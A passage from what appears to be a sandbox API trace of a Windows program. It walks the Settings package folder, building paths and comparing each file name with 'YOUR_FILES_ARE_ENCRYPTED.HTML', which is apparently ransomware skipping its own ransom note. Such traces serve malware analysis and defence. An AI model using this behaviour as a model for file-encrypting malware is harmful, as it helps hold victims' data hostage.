(pszPath="AAA_SettingsPageRestoreOneBackup.settingcontent-ms") returned=".settingcontent-ms" [0121.614] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.614] PathFindExtensionW (pszPath="AAA_SettingsPageRestoreOneBackup.settingcontent-ms") returned=".settingcontent-ms" [0121.614] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x131adc30, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x131adc30, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x2340c766, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x435, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPageRestoreRestore.settingcontent-ms", cAlternateFileName="AA489C~1.SET")) returned 1 [0121.614] StrStrIW (lpFirst="AAA_SettingsPageRestoreRestore.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.614] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageRestoreRestore.settingcontent-ms") returned 175 [0121.614] PathFindExtensionW (pszPath="AAA_SettingsPageRestoreRestore.settingcontent-ms") returned=".settingcontent-ms" [0121.614] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.614] PathFindExtensionW (pszPath="AAA_SettingsPageRestoreRestore.settingcontent-ms") returned=".settingcontent-ms" [0121.614] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x133517d8, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x133517d8, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x233e650b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x44e, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPageScreenPowerAndSleep.settingcontent-ms", cAlternateFileName="AA98C3~1.SET")) returned 1 [0121.614] StrStrIW (lpFirst="AAA_SettingsPageScreenPowerAndSleep.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.614] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageScreenPowerAndSleep.settingcontent-ms") returned 180 [0121.614] PathFindExtensionW (pszPath="AAA_SettingsPageScreenPowerAndSleep.settingcontent-ms") returned=".settingcontent-ms" [0121.614] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.615] PathFindExtensionW (pszPath="AAA_SettingsPageScreenPowerAndSleep.settingcontent-ms") returned=".settingcontent-ms" [0121.615] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1347c6a3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1347c6a3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x2394398e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x40d, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPageSpeech.settingcontent-ms", cAlternateFileName="AA0C1F~1.SET")) returned 1 [0121.615] StrStrIW (lpFirst="AAA_SettingsPageSpeech.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.615] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageSpeech.settingcontent-ms") returned 167 [0121.615] PathFindExtensionW (pszPath="AAA_SettingsPageSpeech.settingcontent-ms") returned=".settingcontent-ms" [0121.615] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.615] PathFindExtensionW (pszPath="AAA_SettingsPageSpeech.settingcontent-ms") returned=".settingcontent-ms" [0121.615] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x135ad91f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x135ad91f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x23a4ea03, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x408, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPageStart.settingcontent-ms", cAlternateFileName="AA7F40~1.SET")) returned 1 [0121.615] StrStrIW (lpFirst="AAA_SettingsPageStart.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.615] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageStart.settingcontent-ms") returned 166 [0121.615] PathFindExtensionW (pszPath="AAA_SettingsPageStart.settingcontent-ms") returned=".settingcontent-ms" [0121.616] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.616] PathFindExtensionW (pszPath="AAA_SettingsPageStart.settingcontent-ms") returned=".settingcontent-ms" [0121.616] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x138ce9b9, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x138ce9b9, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x23a4ea03, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4ae, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPageStorageSenseSaveLocations.settingcontent-ms", cAlternateFileName="AA3F18~1.SET")) returned 1 [0121.616] StrStrIW (lpFirst="AAA_SettingsPageStorageSenseSaveLocations.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.616] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageStorageSenseSaveLocations.settingcontent-ms") returned 186 [0121.616] PathFindExtensionW (pszPath="AAA_SettingsPageStorageSenseSaveLocations.settingcontent-ms") returned=".settingcontent-ms" [0121.616] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.616] PathFindExtensionW (pszPath="AAA_SettingsPageStorageSenseSaveLocations.settingcontent-ms") returned=".settingcontent-ms" [0121.616] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13a98583, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13a98583, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x238f74d9, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x476, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPageStorageSenseStorageOverview.settingcontent-ms", cAlternateFileName="AADC68~1.SET")) returned 1 [0121.616] StrStrIW (lpFirst="AAA_SettingsPageStorageSenseStorageOverview.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.616] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageStorageSenseStorageOverview.settingcontent-ms") returned 188 [0121.616] PathFindExtensionW (pszPath="AAA_SettingsPageStorageSenseStorageOverview.settingcontent-ms") returned=".settingcontent-ms" [0121.616] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.616] PathFindExtensionW (pszPath="AAA_SettingsPageStorageSenseStorageOverview.settingcontent-ms") returned=".settingcontent-ms" [0121.616] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13cd4a2e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13cd4a2e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x2391d733, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x40d, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPageThemes.settingcontent-ms", cAlternateFileName="AA43E2~1.SET")) returned 1 [0121.616] StrStrIW (lpFirst="AAA_SettingsPageThemes.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.616] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageThemes.settingcontent-ms") returned 167 [0121.616] PathFindExtensionW (pszPath="AAA_SettingsPageThemes.settingcontent-ms") returned=".settingcontent-ms" [0121.616] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.616] PathFindExtensionW (pszPath="AAA_SettingsPageThemes.settingcontent-ms") returned=".settingcontent-ms" [0121.616] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13fcf8c0, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13fcf8c0, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x238d127e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x449, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPageTimeRegionDateTime.settingcontent-ms", cAlternateFileName="AAC193~1.SET")) returned 1 [0121.616] StrStrIW (lpFirst="AAA_SettingsPageTimeRegionDateTime.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.616] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageTimeRegionDateTime.settingcontent-ms") returned 179 [0121.616] PathFindExtensionW (pszPath="AAA_SettingsPageTimeRegionDateTime.settingcontent-ms") returned=".settingcontent-ms" [0121.616] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.616] PathFindExtensionW (pszPath="AAA_SettingsPageTimeRegionDateTime.settingcontent-ms") returned=".settingcontent-ms" [0121.616] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x142a4510, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x142a4510, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x233c02ad, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x449, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPageTimeRegionLanguage.settingcontent-ms", cAlternateFileName="AA52B7~1.SET")) returned 1 [0121.616] StrStrIW (lpFirst="AAA_SettingsPageTimeRegionLanguage.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.616] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageTimeRegionLanguage.settingcontent-ms") returned 179 [0121.616] PathFindExtensionW (pszPath="AAA_SettingsPageTimeRegionLanguage.settingcontent-ms") returned=".settingcontent-ms" [0121.616] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.616] PathFindExtensionW (pszPath="AAA_SettingsPageTimeRegionLanguage.settingcontent-ms") returned=".settingcontent-ms" [0121.616] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x147b5757, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x147b5757, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x23a9aeb1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x449, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPageTimeRegionSpelling.settingcontent-ms", cAlternateFileName="AA4071~1.SET")) returned 1 [0121.616] StrStrIW (lpFirst="AAA_SettingsPageTimeRegionSpelling.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.616] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageTimeRegionSpelling.settingcontent-ms") returned 179 [0121.616] PathFindExtensionW (pszPath="AAA_SettingsPageTimeRegionSpelling.settingcontent-ms") returned=".settingcontent-ms" [0121.617] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.617] PathFindExtensionW (pszPath="AAA_SettingsPageTimeRegionSpelling.settingcontent-ms") returned=".settingcontent-ms" [0121.617] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14933008, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x14933008, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x23458c07, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x43a, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPageWindowsDefender.settingcontent-ms", cAlternateFileName="AA994C~1.SET")) returned 1 [0121.617] StrStrIW (lpFirst="AAA_SettingsPageWindowsDefender.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.617] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageWindowsDefender.settingcontent-ms") returned 176 [0121.617] PathFindExtensionW (pszPath="AAA_SettingsPageWindowsDefender.settingcontent-ms") returned=".settingcontent-ms" [0121.617] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.617] PathFindExtensionW (pszPath="AAA_SettingsPageWindowsDefender.settingcontent-ms") returned=".settingcontent-ms" [0121.617] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14c2dcc8, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x14c2dcc8, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x239dc2f0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x478, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_Settings_DeveloperModeGroup.settingcontent-ms", cAlternateFileName="AA7CD7~1.SET")) returned 1 [0121.617] StrStrIW (lpFirst="AAA_Settings_DeveloperModeGroup.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.617] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_Settings_DeveloperModeGroup.settingcontent-ms") returned 176 [0121.617] PathFindExtensionW (pszPath="AAA_Settings_DeveloperModeGroup.settingcontent-ms") returned=".settingcontent-ms" [0121.617] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.617] PathFindExtensionW (pszPath="AAA_Settings_DeveloperModeGroup.settingcontent-ms") returned=".settingcontent-ms" [0121.617] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x166f3270, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x166f3270, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x239dc2f0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x482, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_Settings_DeviceDiscoveryGroup.settingcontent-ms", cAlternateFileName="AA2361~1.SET")) returned 1 [0121.617] StrStrIW (lpFirst="AAA_Settings_DeviceDiscoveryGroup.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.617] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_Settings_DeviceDiscoveryGroup.settingcontent-ms") returned 178 [0121.617] PathFindExtensionW (pszPath="AAA_Settings_DeviceDiscoveryGroup.settingcontent-ms") returned=".settingcontent-ms" [0121.617] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.617] PathFindExtensionW (pszPath="AAA_Settings_DeviceDiscoveryGroup.settingcontent-ms") returned=".settingcontent-ms" [0121.617] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16a608f5, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x16a608f5, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x23a4ea03, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x510, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Accessibility_CursorThickness.settingcontent-ms", cAlternateFileName="AAA_SY~1.SET")) returned 1 [0121.617] StrStrIW (lpFirst="AAA_SystemSettings_Accessibility_CursorThickness.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.617] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_CursorThickness.settingcontent-ms") returned 193 [0121.617] PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_CursorThickness.settingcontent-ms") returned=".settingcontent-ms" [0121.617] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.617] PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_CursorThickness.settingcontent-ms") returned=".settingcontent-ms" [0121.617] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16ce918c, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x16ce918c, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x23a287a5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x524, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Accessibility_IsAnimationsEnabled.settingcontent-ms", cAlternateFileName="AAA_SY~2.SET")) returned 1 [0121.617] StrStrIW (lpFirst="AAA_SystemSettings_Accessibility_IsAnimationsEnabled.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.617] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_IsAnimationsEnabled.settingcontent-ms") returned 197 [0121.617] PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_IsAnimationsEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.617] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.617] PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_IsAnimationsEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.617] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16ed93a3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x16ed93a3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x23884dd1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x517, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Accessibility_IsMouseKeysEnabled.settingcontent-ms", cAlternateFileName="AAA_SY~3.SET")) returned 1 [0121.617] StrStrIW (lpFirst="AAA_SystemSettings_Accessibility_IsMouseKeysEnabled.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.617] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_IsMouseKeysEnabled.settingcontent-ms") returned 196 [0121.617] PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_IsMouseKeysEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.617] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.617] PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_IsMouseKeysEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.618] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x171618d8, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x171618d8, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x23458c07, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x547, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Accessibility_IsOverlappedContentEnabled.settingcontent-ms", cAlternateFileName="AAA_SY~4.SET")) returned 1 [0121.618] StrStrIW (lpFirst="AAA_SystemSettings_Accessibility_IsOverlappedContentEnabled.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.618] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_IsOverlappedContentEnabled.settingcontent-ms") returned 204 [0121.618] PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_IsOverlappedContentEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.618] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.618] PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_IsOverlappedContentEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.618] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x174a8da1, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x174a8da1, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x23884dd1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x54d, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Accessibility_Magnifier_IsAutoStartEnabled.settingcontent-ms", cAlternateFileName="AA5254~1.SET")) returned 1 [0121.618] StrStrIW (lpFirst="AAA_SystemSettings_Accessibility_Magnifier_IsAutoStartEnabled.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.618] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Magnifier_IsAutoStartEnabled.settingcontent-ms") returned 206 [0121.618] PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_Magnifier_IsAutoStartEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.618] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.618] PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_Magnifier_IsAutoStartEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.618] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17567c08, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x17567c08, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x2340c766, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x520, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Accessibility_Magnifier_IsEnabled.settingcontent-ms", cAlternateFileName="AA2C2E~1.SET")) returned 1 [0121.618] StrStrIW (lpFirst="AAA_SystemSettings_Accessibility_Magnifier_IsEnabled.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.618] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Magnifier_IsEnabled.settingcontent-ms") returned 197 [0121.618] PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_Magnifier_IsEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.618] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.618] 